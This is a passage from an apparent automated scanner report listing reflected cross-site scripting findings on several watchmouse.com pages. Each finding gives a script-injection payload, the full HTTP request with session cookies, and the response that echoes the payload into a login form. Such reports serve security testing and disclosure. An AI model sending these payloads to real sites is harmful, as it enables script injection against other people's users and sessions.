<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en8d9ee"><script>alert(1)</script>44472ed8380/management.php" method="post">
...[SNIP]...

1.171. http://www.watchmouse.com/en/management.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/management.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64f2b"><script>alert(1)</script>50cbeca7a5d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/management.php64f2b"><script>alert(1)</script>50cbeca7a5d HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:30 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-a42e382d7702fab1b9197067174f651b"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/management.php64f2b"><script>alert(1)</script>50cbeca7a5d" method="post">
...[SNIP]...

1.172. http://www.watchmouse.com/en/management.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/management.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0d39"><script>alert(1)</script>83345a196c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/management.php?e0d39"><script>alert(1)</script>83345a196c8=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:26 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-2534c57b41fb7d87345a1dce9519a276"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20281

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/management.php?e0d39"><script>alert(1)</script>83345a196c8=1" method="post">
...[SNIP]...

1.173. http://www.watchmouse.com/en/media_contact.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/media_contact.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 625d3"><script>alert(1)</script>62c79d3d9ae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en625d3"><script>alert(1)</script>62c79d3d9ae/media_contact.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:28 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-80d369f8099ae6f086f5b28790abc825"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13127

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en625d3"><script>alert(1)</script>62c79d3d9ae/media_contact.php" method="post">
...[SNIP]...

1.174. http://www.watchmouse.com/en/media_contact.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/media_contact.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ad8e"><script>alert(1)</script>5d14b7094d7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/media_contact.php9ad8e"><script>alert(1)</script>5d14b7094d7 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:29 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-42cbe231d1f8915d808dfd76e9d77606"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/media_contact.php9ad8e"><script>alert(1)</script>5d14b7094d7" method="post">
...[SNIP]...

1.175. http://www.watchmouse.com/en/media_contact.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/media_contact.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa2c7"><script>alert(1)</script>da68d8d35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/media_contact.php?fa2c7"><script>alert(1)</script>da68d8d35=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:26 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-319368b5e3e73bd61d2f4b5a008af48a"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/media_contact.php?fa2c7"><script>alert(1)</script>da68d8d35=1" method="post">
...[SNIP]...

1.176. http://www.watchmouse.com/en/my_subscription.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/my_subscription.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d13ac"><script>alert(1)</script>d193e4cf41c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /end13ac"><script>alert(1)</script>d193e4cf41c/my_subscription.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:59 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-d208559d88e0fef748471202b3178f38"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/end13ac"><script>alert(1)</script>d193e4cf41c/my_subscription.php" method="post">
...[SNIP]...

1.177. http://www.watchmouse.com/en/my_subscription.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/my_subscription.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8187a"><script>alert(1)</script>8b94132c790 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/my_subscription.php8187a"><script>alert(1)</script>8b94132c790 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:12 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-1799aef54a342d5cea0fcfcc7e27555d"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/my_subscription.php8187a"><script>alert(1)</script>8b94132c790" method="post">
...[SNIP]...

1.178. http://www.watchmouse.com/en/my_subscription.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/my_subscription.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb512"><script>alert(1)</script>c18089a26a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/my_subscription.php?fb512"><script>alert(1)</script>c18089a26a0=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:51 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-e13d9132d46e1f013868c65045864cbb"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12897

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/my_subscription.php?fb512"><script>alert(1)</script>c18089a26a0=1" method="post">
...[SNIP]...

1.179. http://www.watchmouse.com/en/my_subscription.php [vpackid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/my_subscription.php

Issue detail

The value of the vpackid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75827"><script>alert(1)</script>fa39f9d05db was submitted in the vpackid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/my_subscription.php?vpackid=19575827"><script>alert(1)</script>fa39f9d05db&vaction=customize HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:08:12 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-0219dd0e329245d9a26b24630a2ff6b5"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/my_subscription.php?vpackid=19575827"><script>alert(1)</script>fa39f9d05db&vaction=customize" method="post">
...[SNIP]...

1.180. http://www.watchmouse.com/en/newsletters.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/newsletters.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57225"><script>alert(1)</script>1f6547819ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en57225"><script>alert(1)</script>1f6547819ed/newsletters.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:28 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-f74dd020ce3f3de60d43ff5febff386b"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en57225"><script>alert(1)</script>1f6547819ed/newsletters.php" method="post">
...[SNIP]...

1.181. http://www.watchmouse.com/en/newsletters.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/newsletters.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fddef"><script>alert(1)</script>f539ffacd0b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/newsletters.phpfddef"><script>alert(1)</script>f539ffacd0b HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:30 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-2ae96d84b500aa48b33f07ae27291339"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/newsletters.phpfddef"><script>alert(1)</script>f539ffacd0b" method="post">
...[SNIP]...

1.182. http://www.watchmouse.com/en/newsletters.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/newsletters.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0706"><script>alert(1)</script>1cd1afd9ac5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/newsletters.php?f0706"><script>alert(1)</script>1cd1afd9ac5=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:26 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-d8710cfce66cf8d887b5fae4444d6dbc"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="/en/newsletters.php?f0706"><script>alert(1)</script>1cd1afd9ac5=1" method="post">
...[SNIP]...

1.183. http://www.watchmouse.com/en/non_profit_offering.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/non_profit_offering.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ee22"><script>alert(1)</script>953163f9df9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en3ee22"><script>alert(1)</script>953163f9df9/non_profit_offering.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:00 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-8a15e285b36be76953fdb5bc55e90a25"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13181

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en3ee22"><script>alert(1)</script>953163f9df9/non_profit_offering.php" method="post">
...[SNIP]...

1.184. http://www.watchmouse.com/en/non_profit_offering.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/non_profit_offering.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e467"><script>alert(1)</script>b4d7b522153 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/non_profit_offering.php4e467"><script>alert(1)</script>b4d7b522153 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:12 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-96278a0a0e18cdf9a7c68c60ef6545ab"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/non_profit_offering.php4e467"><script>alert(1)</script>b4d7b522153" method="post">
...[SNIP]...

1.185. http://www.watchmouse.com/en/non_profit_offering.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/non_profit_offering.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89f8a"><script>alert(1)</script>c74a747cb5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

